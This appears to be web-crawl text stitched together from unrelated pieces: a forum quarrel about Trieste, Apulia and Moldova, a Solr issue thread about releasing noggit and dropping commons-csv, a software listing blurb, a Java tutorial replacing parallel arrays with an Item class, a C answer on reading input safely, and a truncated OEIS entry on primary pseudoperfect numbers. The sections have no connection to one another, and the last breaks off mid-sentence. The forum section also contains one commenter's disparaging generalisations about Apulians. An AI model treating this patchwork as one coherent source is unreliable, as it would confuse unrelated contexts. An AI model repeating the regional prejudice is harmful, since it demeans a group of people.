This article (try putting it into Google Translate or some other on-line translator) describes the pros and cons. As I understand it, the project's father in the early 90's was the Italian economist Tito Boeri: Boeri is close to Pier Luigi Bersani's Democratic Party - generally a supporter of the project. But it has met with the staunch opposition of the residents of the Val Susa on the Italian-French border, as well as the very active support of comedian-cum-politician Beppe Grillo. Against this lobby, French President Hollande is very keen to move forward with this infrastructural project, which has enjoyed the support of Silvio Berlusconi and some moderate centre-left leaders like Bersani and Romano Prodi. It remains to be seen if this project will eventually build its tunnels across the Italo-French Alps - and then proceed across the Italo-Slovenian Alps. If the Alps can be conquered (twice) then I think the rest of the route will follow sooner or later...

"And Trieste, where I live, is the closest part of Italy to Moldova:"
-----------------------------
Unless Piero Dagradi, Fratelli Fabri Editori and my old 'Nuovissimo Atlante Universale' lie... I would say that Brindisi, Bari and virtually the whole of Puglia are significantly closer... So, you are Italian...

Hmmm, I am looking at the map. OK, Apulia is slightly closer by air - which means nothing, especially given that flights only exist to Chisinau from Venice, Milan, Bologna and Rome (no Apulia). In Romania, WizzAir (Hungarian) offers flights Bari-Bucharest, while Carpatair offers a flight Bari-Timisoara. So, Apulia has a chance to be represented. Trieste-Timisoara is a mere 850 km by car (9.5 hours) - and the roads have been improving significantly (close to 85% is now motorway). Trieste-Chisinau is 1,600 km by car - only 40% of which is motorway (basically the same as to Timisoara). Michelin says 22 hours by car to get there. And from Apulia?
Do you really want to challenge Friuli-Venezia Giulia against Apulia in Central Europe? I think Trieste, which shared citizenship with Transylvania under the Hapsburg Emperor for two centuries (1711-1918) has some cards to play in the region. And, Friuli is basically allied to the Veneto in Central Europe. We work together with the industrialists and bankers of Padua, Treviso and Verona. Not to mention the fact that Trieste was for centuries the principal port of Vienna. And then, Croatia is due to enter the EU within 7 months. This should also facilitate greater contact/business with northern Serbia/eastern Romania and northeastern Italy. Here is the website of the Central European Initiative - headquartered in Trieste: No, I am not Italian, don't jump to conclusions because of a simple atlas... I bought it along with many other books when I lived in Italy, a long time ago. Alas, I lost or gave away many of them, but I keep my old atlas and though I have better and more modern atlases in four languages, I always had a preference for this one... Look Milovan, be honest and intellectually rigorous: you wrote "And Trieste, where I live, is the closest part of Italy to Moldova:", which is wrong, and I simply corrected you, that's all. I knew this before I looked it up because I have a "geographical memory", so to say, I visualize maps without actually seeing them. "Hmmm...slightly [well, c. 20 km] closer by air [of course!], which means nothing,"etc. Don't try to make of this a Trieste-Brindisi football match, asking me "Do you really want to challenge Friuli-Venezia Giulia [where you live] against Apulia in Central Europe?" [as if I were an Apulian], and the like, I am not Italian, I don't live in Italy and I really couldn't care less about all this, no more than I cared when I corrected a few wrong things you said on another thread a few minutes ago about slavery in Brazil, etc. 
Honestly, I am under the impression that, being Italian, you didn't like being corrected in this and tried to compensate with data, arguments and digressions, but try to look at it this way: you were WRONG, but now you will never be wrong again on this particular point thanks to my correction. You should have thanked me instead of lecturing me; that's what I usually do when I am rightfully corrected, because thanks to the correction I learn something new. Milovan, you are an intelligent and cultured person, I enjoy reading some of your posts and I learn a lot about Italian politics and economy, etc, but I would like you to understand this strange process:

Milovan: "And Trieste, where I live, is the closest part of Italy to Moldova:"
Accrux: "Unless Piero Dagradi, Fratelli Fabri Editori and my old 'Nuovissimo Atlante Universale' lie... I would say that Brindisi, Bari and virtually the whole of Puglia are significantly closer.."
Milovan: "Do you really want to challenge Friuli-Venezia Giulia against Apulia in Central Europe?" (plus a report on the advantages of Friuli-Venezia Giulia over Puglia/Apulia).

Your reply is half non sequitur, half exaggeration, because I NEVER challenged or even proposed anything, I just stated a bare objective fact. It's as if a Belgian had said that Belgium has a larger area than Moldova, and someone (not even a Moldovan!) had corrected him, and then the Belgian had replied that well, OK, yes, Moldova is slightly larger, but that means nothing, etc, and had written a long story recounting the many economic, political, demographic and geographical advantages of Belgium over Moldova, adding "Do you really want to challenge Belgium against Moldova in Europe?" It's absurd, really.

You got the wrong end of the stick. In Trieste we consider Central Europe our lands, and we do not consider Apulia as having much to do with Central Europe.
Culturally, they have more contact with Russia than with the Czech Republic, Romania, Austria or Moldova. So, yes, I stand corrected on a strictly geographical point "as the crow flies". But I repeat, if you know the territory, culture, business and security arrangements, Apulia is a very long way from Moldova... so if my challenge seemed a non-sequitur, it is because I was wondering how or why you would point out "irrelevant" Apulia. Thank you for explaining your detailed knowledge of maps. Always a useful skill - in peacetime and war ;-) And yes, business, political and social ties look very much like a football match in this part of the world - and football matches are deathly important ;-) Nor did I wish to sound presumptuous, but I am shocked a non-Italian would possess (and cite) Fabbri Editori and the "Nuovissimo Atlante Universale". Was this a hobby or a professional commitment? Eppur si muove... Well, I'll repeat it again: my correction was purely geographical, and was a minor one, almost a blink. Like this ;-) I didn't challenge or propose anything concerning Brindisi and Trieste and their respective communications with Moldova or anywhere else. Some of your considerations just added information, which is always welcome, it's your "Do you really want to challenge Friuli-Venezia Giulia against Apulia in Central Europe?" that left me flabbergasted, because —I repeat for the fourth time— I did NOT challenge or propose anything. In Hegelian terms, how on earth can there be an antithesis (yours) which is the negation of a thesis, a reaction to a proposition, if there is not a previous thesis or proposition? Unless you consider that a mere geographical fact is a thesis, but you accepted this fact (because it's a fact and you had to accept it). Hence the impossibility of a synthesis... =:-o Suppose I replied "yes, but Brindisi was the free provisional capital of the co-belligerent Kingdom of Italy in 1943-44 while Trieste was occupied by the Germans"... 
You would be flabbergasted, or perhaps could reply "yes, but in 1945 Trieste was occupied by the Yugoslavs and the Allies", etc. Digression is like alcohol, there must be a limit, otherwise...

As a matter of fact, my "useful skill" concerning cartography, maps, etc had something to do with wars, past, present or... future. By the way, I could tell you a few stories about Foggia, another important city of Apulia, and about the Foggia Airfield Complex. At that time Apulia was immensely more important strategically than the zone around Venice and Trieste, especially concerning Western and Central Europe and the Balkans. The Italian Air Force still has the very important base of Gioia del Colle.

I don't like football, I don't even know if Trieste and Brindisi have teams... :-)

Don't underestimate non-Italians and their knowledge of Italy and the Italian culture and language. As for maps, etc, the old Istituto Geografico di Novara/De Agostini was one of the most prestigious in the world. I used to have many of its maps and publications. And... By the way, do you know this lady?

"Nor did I wish to sound presumptuous, but I am shocked a non-Italian would possess (and cite) Fabbri Editori and the "Nuovissimo Atlante Universale"."
-------------------
"Shocked"? It must be an irony or an exaggeration of yours, otherwise what kind of non-Italian people do you know? Yes, my vecchio ma Nuovissimo Atlante Universale, I possess it because it's my possession, I own it, I cite it, it's mine, it's my private property because I paid 7,500 lire for it (IVA compresa),... I like it, we have been together for 35 years, and I could kill anyone who tried to take it away from me! All my other atlases, much older and much newer, much better and much prettier, are jealous of it, but this is... MY Nuovissimo Atlante Universale! OK?

Accrux - please! I heard you the first three times. Please accept my humblest apologies for the geographical error.
I am a northern Italian - geography is not just about physical geography - it is also political geography and commercial geography. In any case, many thanks for your info. I had no idea the Nuovissimo Atlante Universale was so highly rated outside Italy! Sometimes living here, it is difficult to distinguish between which are provincial-minded boasts and which are legitimate. I was actually IN Brazzano (Cormòns) today, visiting a friend. There are many Visintin's (or Vizintin's) in the area - although the surname typically belongs to regions a bit further south, closer to the Adriatic Sea. Another famous connection to the world of Geography from Brazzano: Foggia air base was only so critically important because other bases further northward had not been captured yet. And yes, I am quite aware of Professor Jan Karski's direct request conveyed from the Polish Home Army and the Jewish Underground in 1943 to bombard Auschwitz from the captured base in Foggia - the first time the Allies possessed such a base within range of southern Poland. One might say that the Foggia airbase almost demonstrates Anglo-American "complicity" in the Holocaust... No, I was not familiar with the figure of Adele Bianchi. Very interesting. Gioia del Colle Airbase was used by Italian and British Typhoons and Tornados during the intervention in Libya last year. BTW, the current Chief of Staff of the Italian Air Force is the Friulian General Giuseppe Bernardis. He has just released a book revealing the details of Italian participation in Libya - and has attempted to spark a public debate about these activities, given that he is opposed to the hypocrisy and public silence regarding them. To wit: "Why do we continue to pretend we do not have legitimate European and national interests to defend and deny publicly that we are bombing?" (As in Kosovo, Afghanistan and Libya, for example). 
I promise I will not underestimate YOUR knowledge of Italy and Geography - as to other non-Italians, I will reserve the right to form my own judgment. BTW, I picked up in Ann Arbor a decade ago an original copy in German of Von Drygalski's South Polar Expedition, published in Berlin in 1904 (or was it 1905?) I also purchased an original first edition of Layard's "Nineveh and its Remains" - 1849. (I sold both for a good profit which paid for my ticket to the US - the former to an Austrian Alpinist friend and the latter to an Iranian Assyrian friend.) Milovan, it's YOU who have kept repeating the same antithesis-without-thesis three times or more... so you virtually obliged me to repeat my 'disclaimer' three times... I couldn't care less about your minor geographical error, sorry if I forgot to add the emoticon... So please don't go to Canossa (it must be very cold at this time of the year), it's not necessary. I don't think the NAU is so highly rated outside Italy, it's just a personal thing of mine, and also the day I bought it and the woman I was with when I bought it and the book I bought for her and the book she bought for me, and the rain, and... Well, I was and am a romantic, I can't help it. Hence Brazzaville, on the Congo river. Yes, there's always a reason for everything, I bet the USAAF and the RAF would have preferred air bases in Yugoslavia and Lombardy but... Do you have anything against Apulia? You keep belittling it. Not that I care, I just wonder. Alas, yes... I know, I know, that old AFB became known because of that. Thank you for the information about the FRIULIAN (Yes, Friulian) General Giuseppe Bernardis and the link, I will read it. All right, I couldn't care less about other non-Italians, I am an individual rather than collective person, which is why I never speak on other people's behalf, only on my own. 
Anyway, PLEASE correct me every time I say anything wrong about Italy (or geography or any other thing), I want to learn, not to win football matches.

"... geography is not just about physical geography - it is also political geography and commercial geography."
----------------------
Really? Well, I would add human geography, historical geography, military geography, &c. Like Théophile Lavallée's GÉOGRAPHIE PHYSIQUE, HISTORIQUE ET MILITAIRE, Paris, G. Charpentier, Éditeur, 1882, one of the many books about geography I have.

"Really? Well, I would add human geography, historical geography, military geography, &c. Like Théophile Lavallée's GÉOGRAPHIE PHYSIQUE, HISTORIQUE ET MILITAIRE, Paris, G. Charpentier, Éditeur, 1882, one of the many books about geography I have."
Well said!

Yes, I do have something against Apulians - based on experience, not prejudice. A long story... And, you see, Friuli and Liguria are two of the most serious regions/peoples when it comes to military matters - so yes, the fact that a Friulian Chief of Staff is rebelling against a certain ludicrousness in Italy is significant - and deserves to be supported. Bernardis is saying, essentially, that a democratic society should not conduct its defence and foreign policies in such a hypocritical fashion - and he is right. I very much doubt an Apulian Chief of Staff would have bothered to make that point. Not that all Southerners are alike. They are not. The Apulians, for example, are Italian-speaking Greeks.

"Yes, I do have something against Apulians - based on experience, not prejudice. A long story..."
---------------------
Well, that became pretty obvious as I kept reading your posts, but you don't have to worry about me, I couldn't care less, I have never been to Apulia and I don't recall having met any pugliese. As a matter of fact I lived in Rome, which as you know well is halfway between Northern Italy and Southern Italy. And Rome is Rome. Magna Graecia, yes...
There's no such language as Moldovan; it was/is Russian propaganda aimed at creating a false national identity. The language spoken in the Republic of Moldova is identical to Romanian, not similar. Indeed, we all ask you ASAP to CORRECT THE MISTAKE ABOUT THE LANGUAGE! This is an offence to our people, especially mentioning the "similar to Romanian" part! What is your source of information?
http://www.economist.com/comment/1792972
Thanks for the ping. I'll work up a new patch in a few days if nobody else wants to take it (don't hesitate), I'm just currently working on some other issues right now. Ivy parts should be pretty easy either way.

Noggit is now up on Maven Central.

Funny you ask. When I submitted the bundle I received the same 'Staging Completed' notification as I did when I submitted langdetect. A relevant snippet from the email: "The following artifacts have been staged to the Central Bundles-102 (u:MYUSERNAME, a:122.59.251.231) repository." with all the appropriate artifacts listed. Just today I received a 'Staging Repository Dropped' notification with only the following information: "The Central Bundles-102 (u:MYUSERNAME, a:122.59.251.231) staging repository has been dropped." When langdetect was accepted, I received a 'Promotion Completed' email, so I think this is a bad sign, but I've received no information about why it was rejected and don't know how to proceed further.

Chris, I don't see org.noggit:noggit up on Maven Central yet, so I guess your request has hit a snag - do you know what's happening?

I have submitted it for processing, we'll see how things go.

Improved version.

Attaching the POM that I will be using for the noggit release.

Chris: thank you! This fell off my radar a little as I became distracted by other issues, but I'll prepare a release and submit it to Sonatype today.

I keep threatening to commit that patch only because:
- I think it's more legit to have this real release than code copied from Apache Labs. I think it undeniably makes our release more clean.
- I left the patch up for a month already for someone to go through whatever that process is to get it into Maven.

I don't actually follow through on my threats YET because:
- I worry someone will not do the right thing with Maven, and instead just revert back to a fake release of other people's stuff, which I helped work on to remove.
- If someone does such a thing, I feel the maven artifacts are unreleasable, e.g. we are actually back in the commons-csv state. So what would we do? Exclude maven artifacts from any release candidate in this case and just let everyone argue about it? Or does it fall back on the release manager to deal with?

+1 to pull Noggit from its official release, and stop using the source-copied version. Can someone who understands the Maven side do what's necessary here? Sonatype worked great for langdetect, I think?

While Robert's patch for getting Noggit from github does work with Ivy, it means we must also retrieve it with Maven. Can I be of help with getting a full Maven release of Noggit? Would it be preferred if I did it via a 3rd-party release like I did with langdetect?

Patch for adding the commons-csv tests to trunk. Will commit shortly.

I became a CSV committer to address all of the issues.

Great, Yonik. As a CSV committer, could you not initiate a release? On the CSV web site, it says: "There are currently no official downloads, and will not be until CSV moves out of the Sandbox." CSV has moved out of the Sandbox, so what stops you (the team) from taking the code as is and releasing it, perhaps as a 0.x version?

Patch for noggit: nuking the local copy of noggit (--no-diff-deleted), and using the download instead (changing package names to org.noggit where it's used). All tests and javadocs pass.

Wait: a lot of effort doing what? I became a CSV committer to address all of the issues.

"wrt commons-csv alternatives, it's too risky for little/no gain." This confuses me: commons-csv is unreleased, while there are other license-friendly packages (e.g. opencsv) that have been released for some time (multiple releases), been tested in the field, had bugs found & fixed, etc. Why use an unreleased package when released alternatives are available?

"I put a lot of effort into getting commons-csv up to snuff," Wait: a lot of effort doing what? Did you have to modify commons-csv sources?
Or do you mean open issues w/ the commons devs to fix things/add test cases to commons-csv sources (great!)...?

"Switching implementations would most likely result in a lot of regressions that we don't have tests for." I'd expect the reverse, i.e., it's more likely there are bugs in commons-csv (it's not released and thus not heavily tested) than e.g. in opencsv. And if somehow that's really the case (e.g. we have particular/unusual CSV parsing requirements), we should have our own tests asserting so? If the deal is about commons-csv not having a release yet, a much easier (and safer) path seems to be to just wait for them to do that and upgrade at that time.

I put a lot of effort into getting commons-csv up to snuff, and almost all of the tests for that reside in commons-csv itself, not in Solr. I'll bring the tests from commons-csv into Solr.

OK, I'll make a patch. Of course maven is a separate issue, but ivy can just download that release...

"Is this safe to cutover to in trunk?" Yep, it should be exactly the same code (just with different package names of course).

"First steps:" +1 !!!!!

Is this safe to cutover to in trunk? I can do the ivy parts.

First steps: wrt commons-csv alternatives, it's too risky for little/no gain. I put a lot of effort into getting commons-csv up to snuff, and almost all of the tests for that reside in commons-csv itself, not in Solr. Switching implementations would most likely result in a lot of regressions that we don't have tests for.

ps: Steve, you're absolutely correct about the reason why there was never a separate noggit release. If github had been around in 2006, I might have chosen differently.

I guess this means "official apache releases", but if the release is done in a private namespace then this isn't a problem?
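The regression worry is concrete: CSV has edge cases (quoted fields, embedded commas, doubled quotes) where parser implementations genuinely differ, which is exactly what the commons-csv test suite pins down. As an illustration only, here is a hand-rolled splitter for one such case; this is my own sketch, not code from commons-csv, opencsv, or Solr, and the class name is hypothetical:

```java
import java.util.ArrayList;
import java.util.List;

public class CsvSketch {
    // Minimal RFC-4180-style line splitter: handles quoted fields with
    // embedded commas; a doubled quote inside a quoted field becomes one quote.
    public static List<String> parseLine(String line) {
        List<String> fields = new ArrayList<>();
        StringBuilder cur = new StringBuilder();
        boolean inQuotes = false;
        for (int i = 0; i < line.length(); i++) {
            char c = line.charAt(i);
            if (inQuotes) {
                if (c == '"') {
                    if (i + 1 < line.length() && line.charAt(i + 1) == '"') {
                        cur.append('"'); // escaped quote: "" -> "
                        i++;
                    } else {
                        inQuotes = false; // closing quote
                    }
                } else {
                    cur.append(c);
                }
            } else {
                if (c == '"') {
                    inQuotes = true;
                } else if (c == ',') {
                    fields.add(cur.toString()); // field boundary
                    cur.setLength(0);
                } else {
                    cur.append(c);
                }
            }
        }
        fields.add(cur.toString()); // last field
        return fields;
    }

    public static void main(String[] args) {
        System.out.println(parseLine("plain,\"has,comma\",\"say \"\"hi\"\"\""));
    }
}
```

Even this tiny sketch makes the point: whether two parsers agree on inputs like these is exactly what a shared test suite has to assert before swapping implementations.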
I mean – I could probably take the source right now, change the group id to something I have access to (com.carrotsearch.thirdparty) and release it, but so can Yonik (under his own domain or whatever namespace he wishes that is different than Apache's)? I admit this is kind of weird, that Solr is using something that cannot be officially released. Why not make it part of Solr then? Just copy the source code over and publish it as a separate artefact?

Minor nit about releasing noggit, which is hosted at Apache Labs, from the Guidelines: "Releases: Labs are prohibited from making releases."

I didn't know it's Yonik's actually. It even has a pom.xml file –? Yonik, if you have an account at Sonatype this takes as little as changing the revision number to something without a SNAPSHOT and an mvn deploy (plus an accept from Nexus). Let me know if you need some guidance but it should be a 10-minute effort if you have the maven code ready.

I agree that noggit might be the most performant solution. The question is: why is there no release already? If it's maintained by Yonik at ASF and successfully used in Solr, why not release the version we currently have in maven and use it? If Yonik thinks it's not ready for a release, we should not use it. Similar to what Dawid did: it took him a few hours to make the Carrot 1.5 stuff available via a Maven repo.

I had originally intended to add noggit to this issue, but there is some discussion about replacing it given how very efficient it is. Perhaps it's a good idea to, as this issue says, explore alternatives to see whether something else meets our performance needs.

I used GSON and was happy with it. It even contains sanity checks which come in handy if you're emitting insane data...

What about apache-noggit? There are lots of other JSON parsers/generators available!

Yeah, I know. I was just pointing out that it used ASL. BSD or ASL2 – either is fine with another ASL2 project.
Yup, I received the notification today. So all I need to remember in the future is not to submit near the weekend.
https://issues.apache.org/jira/browse/SOLR-3296?attachmentOrder=desc
Sources: mirror 1 (tar.gz) [6 KB]

AxKit::XSP::ESQL is an Extended SQL taglib for AxKit eXtensible Server Pages.

SYNOPSIS: Add the esql: namespace to your XSP <xsp:page> tag: <xsp:page ... And add this taglib to AxKit (via httpd.conf or ...
http://linux.softpedia.com/progDownload/AxKit-XSP-ESQL-Download-27911.html
CC-MAIN-2013-48
refinedweb
116
64.61
students how to use arrays, many instructors give assignments requiring them to use two or three arrays in parallel to represent attributes in what should be classes. While this type of assignment allows students to gain confidence when using arrays, this type of approach becomes very cumbersome to use and difficult to manage, especially as the number of elements stored increases in size and more so as the use of resizable collections like ArrayLists come into play. So let's go ahead and start out with a standard inventory program that uses parallel arrays to store price, quantity and name. This program will display a menu using a JOptionPane window requesting input for adding inventory, updating a current item's status, displaying the inventory, and quitting. If the user wants to update an item, we will display another menu asking for the index of the item to change. After we receive the index, we will display another menu asking the user if they want to update the name, quantity or price, followed by a prompt for the new value. And as was the requirement when I did the assignment, we'll limit the size of the arrays to 10 items in inventory. import javax.swing.JOptionPane; public class Inventory{ public static void main(String[] args){ /* As we can see, we are starting out with 3 parallel arrays representing quantity, price, and name. Each element in an array lines up with the elements at the corresponding indices in the other two arrays.
So quantity[0] represents the same item as price[0] and name[0] */ int[] quantity = new int[10]; //quantity defaults to 0 for all items double[] price = new double[10]; //price defaults to 0 for all items //names default to null, so we can't use an item's name until it is assigned one String[] name = new String[10]; boolean toContinue = true; String input = ""; int menuItem = 0; //holds place so when elements are supposed to be added, the appropriate indices are updated int counter = 0; while(toContinue){ input = JOptionPane.showInputDialog("1) Add an item\n2) Modify an existing item\n3) Display inventory\n4) Exit"); menuItem = Integer.parseInt(input); switch(menuItem){ case 1: //add an item name[counter] = JOptionPane.showInputDialog("Enter the name of this item"); quantity[counter] = Integer.parseInt(JOptionPane.showInputDialog("Enter the quantity available for this item")); price[counter] = Double.parseDouble(JOptionPane.showInputDialog("Enter the price of this item")); counter++; //go to the next position break; //jump out of the switch case 2: //modify existing item //pick the item int index = Integer.parseInt(JOptionPane.showInputDialog("Which item from 0-9 do you wish to modify?")); //set up the display for the item String item = "Name: " + name[index] + "\nQuantity: " + quantity[index] + "\nPrice: " + price[index]; //prompt for category to update int category = Integer.parseInt(JOptionPane.showInputDialog(item + "\nModify:\n1) Name\n2) Quantity\n3) Price")); //and effect the update if(category == 1) name[index] = JOptionPane.showInputDialog("Enter a new name"); else if(category == 2) quantity[index] = Integer.parseInt(JOptionPane.showInputDialog("Enter a new quantity")); else if(category == 3) price[index] = Double.parseDouble(JOptionPane.showInputDialog("Enter a new price")); break; case 3: //display items String display = ""; for(int i = 0; i < name.length; i++){ //if there isn't a name for an item, we won't display it if(name[i] == null) break; display += name[i] + "\t" + quantity[i]
+ "\t" + price[i] + "\n"; } //if there are no items in inventory, display such if(display.trim().length() == 0) JOptionPane.showMessageDialog(null, "There are no items in inventory"); //otherwise, display what is in inventory else JOptionPane.showMessageDialog(null,"Name\tQuantity\tPrice\n" + display); break; case 4: //exit System.exit(0); } } } } So far, this program isn't too bad. A few tedious things (beyond getting input) that I noticed included making the display String for a given item, like at this line String item = "Name: " + name[index] + "\nQuantity: " + quantity[index] + "\nPrice: " + price[index];. Consider this though- what would happen if there were no size limitations as to the number of items you could have in inventory (meaning we are now using ArrayLists in parallel instead of static arrays)? When you go to add or remove (which would be the next logical step) items, you wouldn't have to use a counter variable because the ArrayLists would automatically resize as soon as elements are added or removed from them. This gets a little sticky, however, when removing elements in the middle of the lists, as it is very easy to get attributes mixed up. For example, you could remove element 9 from the name list, but end up removing element 8 from the quantity and element 10 from the price list. This would completely mess up the data integrity and accuracy, plus it is very hard to debug this error. Another logical step would be to sort the elements according to one of their attributes (name, quantity or price). Using parallel arrays, you have to enforce each step of the sort amongst all three arrays. So for example, if you sort the quantity array in ascending order, the changes aren't automatically affected throughout the other two arrays. This means that if you call Arrays.sort() on one array, it doesn't necessarily change the other two.
And if you call Arrays.sort() on each of the three arrays, you have just sorted three arrays individually, so your name, quantity and price array are all in order according to the values stored in them. However, you will have mismatched all the attributes from the item they are supposed to describe. Now that we've seen the cons of parallel arrays, let's talk about the advantages of using classes instead. First off, the attributes representing each item are contained within the class. This means that the quantity, price and name cannot get mismatched like we saw when using parallel arrays. This also means that we only have to manage one collection, so it saves memory. Next, we can use methods to make our lives easier. This means that we can set up a toString() method in the class, and when invoked, it will return a nice formatted (to our specifications) String; and we can also use a single setter method so we can eliminate the group of if statements for updating an item. So in short, you are dealing with one variable that holds all the information and can have automated tasks set up instead of having to hard code each component as we saw above. Now that we've discussed the advantages of classes, let's take a look into putting them into use. To start, we'll take a look at designing a class to model an Item. public class Item{ /*notice how each attribute is contained within the class. by doing this, we don't have to worry about mismatching the attributes as seen in parallel arrays */ private int quantity; private double price; private String name; /* when the class is created, the constructor is invoked. this specific constructor allows for the specification of each attribute upon the creation of the object */ public Item(String name, int quantity, double price){ //initialize the attributes this.name = name; this.price = price; this.quantity = quantity; } /* This constructor simply creates a default item with a generic name, none in stock and no price set.
It calls the other Item() constructor through the use of the keyword this */ public Item(){ this("New Item",0,0); } /* Basic getter and setter methods for each attribute */ public void setName(String name){this.name = name;} public String getName(){return name;} public void setPrice(double price){this.price = price;} public double getPrice(){return price;} public void setQuantity(int quantity){this.quantity = quantity;} public int getQuantity(){return quantity;} /* this setter method is a little more advanced. it is designed to allow for an easy update of the item by passing a param representing the attribute to update and the new value. @params: -int category: 1- Name, 2- Quantity, 3- Price -String value: represents the new value; will be parsed to appropriate type */ public void update(int category, String value){ switch(category){ case 1: name = value; return; case 2: //value is converted to an int quantity = Integer.parseInt(value); return; case 3: //value is converted to a double price = Double.parseDouble(value); return; } } /* This toString() method makes it very easy to get formatted information about the Item rather than having to go through each of the getter methods individually. Returns name, quantity and price separated by tabs */ public String toString(){ return name + "\t" + quantity + "\t" + price; } } After looking at the Item class, I notice how it is a lot more organized than using parallel arrays, plus it provides a little tighter control on the attributes and more usability through many of its methods, most notably the toString() and update() methods. Now let's redo our Inventory program using the Item class instead of Parallel arrays. 
import javax.swing.JOptionPane; public class Inventory{ public static void main(String[] args){ //notice how we only use one array instead of 3 //and that the array type is the same as class name //for Item Item[] inventory = new Item[10]; boolean toContinue = true; String input = ""; int menuItem = 0; int counter = 0; while(toContinue){ input = JOptionPane.showInputDialog("1) Add an item\n2) Modify an existing item\n3) Display inventory\n4) Exit"); menuItem = Integer.parseInt(input); switch(menuItem){ case 1: //add an item /* as we see here, we still need to get the input for each attribute but we eliminate a few lines where we had to update each parallel array. instead, we just create a new Item, and increment the counter in the same statement. counter++ will execute after the item has been created in the current index of counter. so if counter = 0, a new Item will be created at inventory[0], then counter increments to 1. */ String name = JOptionPane.showInputDialog("Enter the name of the item"); int quantity = Integer.parseInt(JOptionPane.showInputDialog("Enter the quantity of the item")); double price = Double.parseDouble(JOptionPane.showInputDialog("Enter the price")); inventory[counter++] = new Item(name, quantity, price); break; case 2: //modify an existing item int index = Integer.parseInt(JOptionPane.showInputDialog("Which item from 0-9 do you wish to modify?")); //notice how we just call the toString() method instead of having a line to set up the String display int category = Integer.parseInt(JOptionPane.showInputDialog(inventory[index].toString() + "\nModify:\n1) Name\n2) Quantity\n3) Price")); String value = JOptionPane.showInputDialog("Enter the new value"); //notice how we use the update() method from the given Item and let it update its attributes internally //rather than messing around with determining what parallel array to update and how to parse the values inventory[index].update(category, value); break; case 3: //display items //notice how many 
fewer lines this takes up than iterating through each parallel array //and appending the information to the display String //Here, the toString() method comes in handy, plus having one array makes the task easier //So we have about 4 lines of code for this part total String display = "Name\tQuantity\tPrice\n"; for(Item i: inventory){ if(i != null) display += i.toString() + "\n"; } JOptionPane.showMessageDialog(null, display); break; case 4: //exit System.exit(0); }//end switch }//end while } } As we can see, this program gives us tighter control over each Item because we don't have to worry about keeping up with which indices represent each Item. This becomes increasingly important as we move onto using resizable collections like ArrayList, and as we attempt to sort the Items by a given attribute (or multiple attributes). We also have the convenience of using methods defined in the Item class, something we didn't have the luxury of doing when using parallel arrays. By using classes instead of parallel arrays, you will begin to get a better handle on Object-Oriented Programming. This will help you as you continue your studies of Java, especially as you come across more advanced OO concepts like inheritance, abstraction and polymorphism, in addition to helping you better organize your program.
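The sorting step described in the conclusion above is where classes pay off most visibly. As a sketch (the class and method names here are illustrative, not from the tutorial), sorting by any attribute becomes a single comparator call, with no way to mismatch indices:

```java
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;

public class SortDemo {
    // A minimal Item: all three attributes travel together in one object,
    // so a sort can never mismatch name, quantity and price.
    static class Item {
        final String name;
        final int quantity;
        final double price;

        Item(String name, int quantity, double price) {
            this.name = name;
            this.quantity = quantity;
            this.price = price;
        }
    }

    // Sort the whole inventory by quantity, ascending. With parallel arrays
    // this would require reordering three arrays in lockstep by hand.
    static void sortByQuantity(List<Item> inventory) {
        inventory.sort(Comparator.comparingInt(item -> item.quantity));
    }
}
```

Swapping in a different comparator re-sorts by another attribute, again with no risk of mixing up indices between collections.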
http://www.dreamincode.net/forums/topic/147196-moving-away-from-parallel-arrays/
CC-MAIN-2016-26
refinedweb
2,001
50.26
There seem to be a LOT of ways you can get user input in C. What is the easiest way that requires little code? Basically I need to display this: Enter a file name: apple.text The simplest "correct" way is probably this one, taken from Bjarne Stroustrup's paper Learning Standard C++ As A New Language. (Note: I changed Bjarne's code to check for isspace() instead of just end of line. Also, due to @matejkramny's comment, to use while(1) instead of while(true)...and so long as we're being heretical enough to edit Stroustrup's code, I've subbed in C89 comments instead of C++ style too. :-P)

#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>

void quit() /* write error message and quit */
{
    fprintf(stderr, "memory exhausted\n");
    exit(1);
}

int main()
{
    int max = 20;
    char* name = (char*) malloc(max); /* allocate buffer */
    if (name == 0) quit();

    printf("Enter a file name: ");

    while (1) { /* skip leading whitespace */
        int c = getchar();
        if (c == EOF) break; /* end of file */
        if (!isspace(c)) {
            ungetc(c, stdin);
            break;
        }
    }

    int i = 0;
    while (1) {
        int c = getchar();
        if (isspace(c) || c == EOF) { /* at end, add terminating zero */
            name[i] = 0;
            break;
        }
        name[i] = c;
        if (i == max - 1) { /* buffer full */
            max += max;
            name = (char*) realloc(name, max); /* get a new and larger buffer */
            if (name == 0) quit();
        }
        i++;
    }

    printf("The filename is %s\n", name);
    free(name); /* release memory */
    return 0;
}

That covers: Are there simpler but broken solutions, which might even run a bit faster? Absolutely!! If you use scanf into a buffer with no limit on the read size, then if your input exceeds the size of the buffer, it will create a security hole and/or crash. Limiting the size of the read to, say, only the first 100 characters of a filename might seem better than crashing. But it can be worse; for instance if the user meant (...)/dir/foo/bar.txt but you end up misinterpreting their input and overwriting a file called bar.t which perhaps they cared about.
It's best to get into good habits early in dealing with these issues. My opinion is that if your requirements justify something close-to-the-metal and "C-like", it's well worth it to consider the jump to C++. It was designed to manage precisely these concerns--with techniques that are robust and extensible, yet still perform well.
https://codedump.io/share/zcdr6FRbXQH6/1/what-is-the-simplest-way-of-getting-user-input-in-c
CC-MAIN-2018-09
refinedweb
403
69.92
1,1 Primary pseudoperfect numbers are the solutions of the "differential equation" n' = n-1, where n' is the arithmetic derivative of n. - Paolo P. Lava, Nov 16 2009 Same as n > 1 such that 1 + sum n/p = n (and the only known numbers n > 1 satisfying the weaker condition that 1 + sum n/p is divisible by n). Hence a(n) is square-free, and is pseudoperfect if n > 1. Remarkably, a(n) has exactly n (distinct) prime factors for n < 9. - Jonathan Sondow, Apr 21 2013 From the Wikipedia article: it is unknown whether there are infinitely many primary pseudoperfect numbers, or whether there are any odd primary pseudoperfect numbers. - Daniel Forgues, May 27 2013 Since the arithmetic derivative of a prime p is p' = 1, 2 is obviously the only prime in the sequence. - Daniel Forgues, May 29 2013 Just as 1 is not a prime number, 1 is also not a primary pseudoperfect number, according to the original definition by Butske, Jaje, and Mayernik, as well as Wikipedia and MathWorld. - Jonathan Sondow, Dec 01 2013 Is it always true that if a primary pseudoperfect number N > 2 is adjacent to a prime N-1 or N+1, then in fact N lies between twin primes N-1, N+1? See A235139. - Jonathan Sondow, Jan 05 2014 Same as n > 1 such that A069359(n) = n - 1. - Jonathan Sondow, Apr 16 2014 Table of n, a(n) for n=1..8. W. Butske, L. M. Jaje, and D. R. Mayernik, On the Equation Sum_{p|N} 1/p + 1/N = 1, Pseudoperfect 